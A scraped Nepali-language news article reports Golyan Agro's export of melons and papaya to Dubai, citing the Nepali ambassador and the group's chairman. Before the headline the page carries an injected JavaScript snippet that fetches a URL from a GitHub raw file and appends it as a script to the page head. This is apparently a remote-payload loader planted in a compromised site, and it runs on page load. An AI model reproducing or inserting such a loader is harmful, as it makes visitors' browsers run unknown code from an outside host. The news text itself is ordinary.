;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोल्यान एग्रोले दुबई निर्यात गर्‍यो खरबुजा र मेवा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • गोल्यान एग्रोले दुबई निर्यात गर्‍यो खरबुजा र मेवा
समाचार

गोल्यान एग्रोले दुबई निर्यात गर्‍यो खरबुजा र मेवा

१९ वैशाख,

काठमाडौं । नेपालबाट गोल्यान एग्रोले दुबईमा खरबुजा र मेवा निर्यात गरेको छ । कृषि तथा पशुपन्छी विकास मन्त्रालयको समन्वयमा गोल्यान एग्रोले बुधबार नेपालबाट फलफूल आयात गरेको हो ।

नेपालबाट बुधबार सात हजार किलो खरबुजा र १५ सय किलो मेवा दुबई पुगेको दुबईका लागि नेपाली राजदूत कृष्णप्रसाद ढकालले ट्वीटरमार्फत जानकारी दिएका छन् ।

नेपालमा उत्पादित फलफूल तथा कृषिजन्य वस्तुहरू युएई आयातका लागि दूतावासले पहल गरिरहेको राजदूत ढकालले उल्लेख गरेका छन् ।

उक्त फलफूल गोल्यान एग्रो कम्पनीले निर्यात गरेको गोल्यान ग्रुपका अध्यक्ष पवन गोल्यानले बताए ।

विशेष गरेर निर्यातजन्य उद्योगहरुमा लगानी रहेको पुरानो व्यवसायिक घराना गोल्यान समूह पछिल्लो समय कृषिमा लगानी गर्नतिर लागेको छ ।

समूहका अध्यक्ष गोल्यानले केही वर्षयता कृषिमा निकै रुची देखाएका छन् । उनकै सक्रियतामा झापाका विभिन्न ठाउामा अर्गानिक कृषि फार्महरु शुरु गरिएका छन् ।

फेसबुक प्रतिक्रियाहरु